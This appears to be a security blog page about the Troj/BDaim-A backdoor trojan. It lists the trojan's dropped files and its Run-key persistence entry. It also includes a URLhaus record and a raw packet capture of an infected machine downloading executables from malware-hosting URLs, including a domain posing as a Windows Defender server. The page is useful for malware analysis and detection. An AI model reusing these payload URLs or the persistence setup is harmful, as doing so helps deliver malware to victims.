AVAST? Business Antivirus Managed 1 Year-AS-EN

Trojan Malware BDaim-A is c000.exe vbc.exe Malicious X.509 SSL Certificate PCAP File Download Traffic Sample


Troj/BDaim-A is a backdoor trojan.

The Trojan installs itself as uvwxyz.exe in system folder of Windows and creates the following files, also in the system folder:

mswinsck.ocx (This is clean microsoft socket control)
raim.ocx

Troj/BDaim-A creates the following registry entry so that it automatically starts up with Windows:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\uvwxyz = C:\WINDOWS\System32\uvwxyz.exe

In addition, Troj/BDaim-A creates the following registry entries:

HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Host = “localhost”
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Port = dword:0000103f
HKCU\Software\Microsoft\Visual Basic\
HKCU\Software\Microsoft\Visual Basic\6.0\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) (default) = “Microsoft WinSock Control, version 6.0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Control\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A52-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A53-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A57-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(40FC6ED4-2438-11CF-A3DB-080036F12502)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(40FC6ED5-2438-11CF-A3DB-080036F12502)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\ThreadingModel = “Apartment”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus(default) = “0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\1\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\1(default) = “132497”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ProgID\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ProgID(default) = “MSWinsock.Winsock.1”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Programmable\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ToolboxBitmap32\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ToolboxBitmap32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX, 1”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Version\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Version(default) = “1.0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \VersionIndependentProgID\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \VersionIndependentProgID(default) = “MSWinsock.Winsock”
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) (default) = “Winsock General Property Page Object”
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) (default) = “IMSWinsockControl”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid(default) = “(00020424-0000-0000-C000-000000000046)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32(default) = “(00020424-0000-0000-C000-000000000046)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\Version = “1.0”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) (default) = “DMSWinsockControlEvents”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid(default) = “(00020420-0000-0000-C000-000000000046)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32(default) = “(00020420-0000-0000-C000-000000000046)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\Version = “1.0”
HKCR\MSWinsock.Winsock\
HKCR\MSWinsock.Winsock(default) = “Microsoft WinSock Control, version 6.0”
HKCR\MSWinsock.Winsock.1\
HKCR\MSWinsock.Winsock.1(default) = “Microsoft WinSock Control, version 6.0”
HKCR\MSWinsock.Winsock.1\CLSID\
HKCR\MSWinsock.Winsock.1\CLSID(default) = “(248DD896-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\MSWinsock.Winsock\CLSID\
HKCR\MSWinsock.Winsock\CLSID(default) = “(248DD896-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\MSWinsock.Winsock\CurVer\
HKCR\MSWinsock.Winsock\CurVer(default) = “MSWinsock.Winsock.1”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0(default) = “Microsoft Winsock Control 6.0 (SP5)”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\win32\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\win32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\FLAGS\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\FLAGS(default) = “2”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\HELPDIR\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\HELPDIR(default) = “”

URLhaus Database

You are currently viewing the URLhaus database entry for http://f0384177.xsph.ru/LO/c000.exe which is being or has been used to serve malware. Please consider that URLhaus does not differentiate between websites that have been compromised by hackers and such that has been setup by cybercriminals for the sole purpose of serving malware.

Database Entry


ID:286246
URL: http://f0384177.xsph.ru/LO/c000.exe
URL Status:Offline
Host: f0384177.xsph[.]ru
Date added:2020-01-11 10:33:04 UTC
Threat: Malware download

2020-01-16 06:45:23.373218 IP 192.168.86.25.56261 > 151.80.241.110.80: Flags [P.], seq 1:432, ack 1, win 16425, length 431: HTTP: GET /mich/vbc.exe HTTP/1.1
E….q@…S/..V..P.n…P…*.WWkP.@).A..GET /mich/vbc.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: windowsdefenderserversecureserver.duckdns.org
Connection: Keep-Alive

2020-01-16 06:45:23.474701 IP 151.80.241.110.80 > 192.168.86.25.56261: Flags [.], seq 1:1461, ack 432, win 513, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.p.N..P.n..V..P…WWk….P…d…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:45:23 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 16 Jan 2020 04:32:10 GMT
ETag: “16ea00-59c3a4efb28b9”
Accept-Ranges: bytes
Content-Length: 1501696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2020-01-16 06:45:52.794502 IP 192.168.86.25.56262 > 141.8.192.151.80: Flags [P.], seq 1:402, ack 1, win 16425, length 401: HTTP: GET /LO/c000.exe HTTP/1.1
E…..@….
..V……..PU.wZ.^3eP.@)….GET /LO/c000.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: f0384177.xsph.ru
Connection: Keep-Alive

2020-01-16 06:45:52.966457 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], ack 402, win 237, length 0
E..(J>@.+..0……V..P…^3eU.x.P………….
2020-01-16 06:45:53.040728 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], seq 1:1461, ack 402, win 237, length 1460: HTTP: HTTP/1.1 503 Service Unavailable
E…J?@.+..{……V..P…^3eU.x.P…….HTTP/1.1 503 Service Unavailable
Server: openresty
Date: Thu, 16 Jan 2020 11:45:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

2806



…….. …….. ……………………

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />

<link rel="stylesheet" type="text/css" href="https://index.from.sh/fonts.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/index.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/stub.css?10" />

2020-01-16 06:45:53.391894 IP 192.168.86.25.56265 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
E…..@….|..V….”…. …Ae=
P.@)D…….y…u..^..S:i0..Z..o..i…..\c/u.E~ ……./.5…
….. .
.2.8…….4…………..index.from.sh……….
…………..
2020-01-16 06:45:53.392017 IP 192.168.86.25.56266 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
E…..@….{..V….”….Py.*:..kP.@)$-……y…u..^..S ..mX..x.C+)8.w<.J..6-….U;…./.5… ….. . .2.8…….4…………..index.from.sh………. ………….. 2020-01-16 06:45:53.528765 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], ack 127, win 229, length 0
E..(.8@.+……”..V………….P….0……..
2020-01-16 06:45:53.530363 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1:1461, ack 127, win 229, length 1460
E….9@.+……”..V………….P…/…….Y…U…at7.GRB..V.b…-.IK[Gs..&s…hO /.NQ….|.wX……v….E..c.A”.F…………………………..q0..m0..U…….. .b.h5.?…….0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U.
..COMODO CA Limited1604..U…-COMODO RSA Domain Validation Secure Server CA0…180312000000Z..200311235959Z0s1!0…U….Domain Control Validated1 0…U….Hosted by OnlineNic Inc1.0…U….PositiveSSL1.0…U….index.from.sh0..”0.. *.Hs………….0..
……..2Y
2s..v@…………..h2.m}..(.6...&......?s...Z).:....C..:....i.....-.E.r..]....e.6j.....;>...>.[.....5P[ .[.n....:..4. ...S...k...........?x......_...+..b.QU$1..Q..@...F....e&..."...^.....o3....f........g...4......smX>h...d....b!C.;. .G....P5.l.X............0...0...U.#..0.....j:.Z.....Vs.C.:(..0...U.......#k..=.k....R.$.E...0...U...........0...U.......0.0...U.%..0...+.........+.......0O..U. .H0F0:..+.....1....0+0)..+.........https://secure.comodo.com/CPS0...g.....0T..U...M0K0I.G.E.Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0....+........y0w0O..+.....0..Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$..+.....0...http://ocsp.comodoca.com0+..U...$0"..index.from.sh..www.index.from.sh0.. *.H.............c-.[.....p5..(]n.....-..2}.. .A(.?..'...O.,.X2.5d.4N.f.m......7..............Y>.X..G.F-....D.v....&Y....Y%......l.Cq...*1&.D.....>6.S...(>.....~!....Fs....C.39*.....p.k....u....h...A....Y...gmX............<M.p...gr 2020-01-16 06:45:53.530672 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1461:2921, ack 127, win 229, length 1460 E....:@.+......"..V........}....P.......[.Y....Y.V....%..<…..pm.Zl…..)s….C….0…0……….+.n..u6l..n..|..0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U. ..COMODO CA Limited1+0)..U…”COMODO RSA Certification Authority0…140212000000Z..290211235959Z0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U. ..COMODO CA Limited1604..U…-COMODO RSA Domain Validation Secure Server CA0..”0.. .H………….0.. ………..Y..85.,….I.d..b.E.:………..mw……..>….I…..K.. …^e.>..L…E^R/4.H$d.A…..g…z.S.;|…Uo.G |..”……W.p.`…-……..{...(!.Mo.O%..z5.&.F…Y5..N.CP?Y..lQ!.X…uPx>L…..k…;…R…$.n.’QE.p.%C…J…~..m…’s].E0….A…D………………..e0..a0…U.#..0…..~.=…<….8…22.0…U……..j:.Z…..Vs.C.:(..0…U………..0…U…….0…….0…U.%..0…+………+…….0…U. ..0.0…U. .0…g…..0L..U…E0C0A.?.=.;http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q..+……..e0c0;..+…..0../http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$..+…..0…http://ocsp.comodoca.com0.. *.H………….N+vO..b6..w.’….D…>..ff.>.I..5…….5..6.u…Pr|..w….. ..g..V.{.D.B..]..PF….Yl…….:B…K4{‘;..o$;r.ctX<.l?O…….7

Please follow and like us:

Written By

admin

Leave a Reply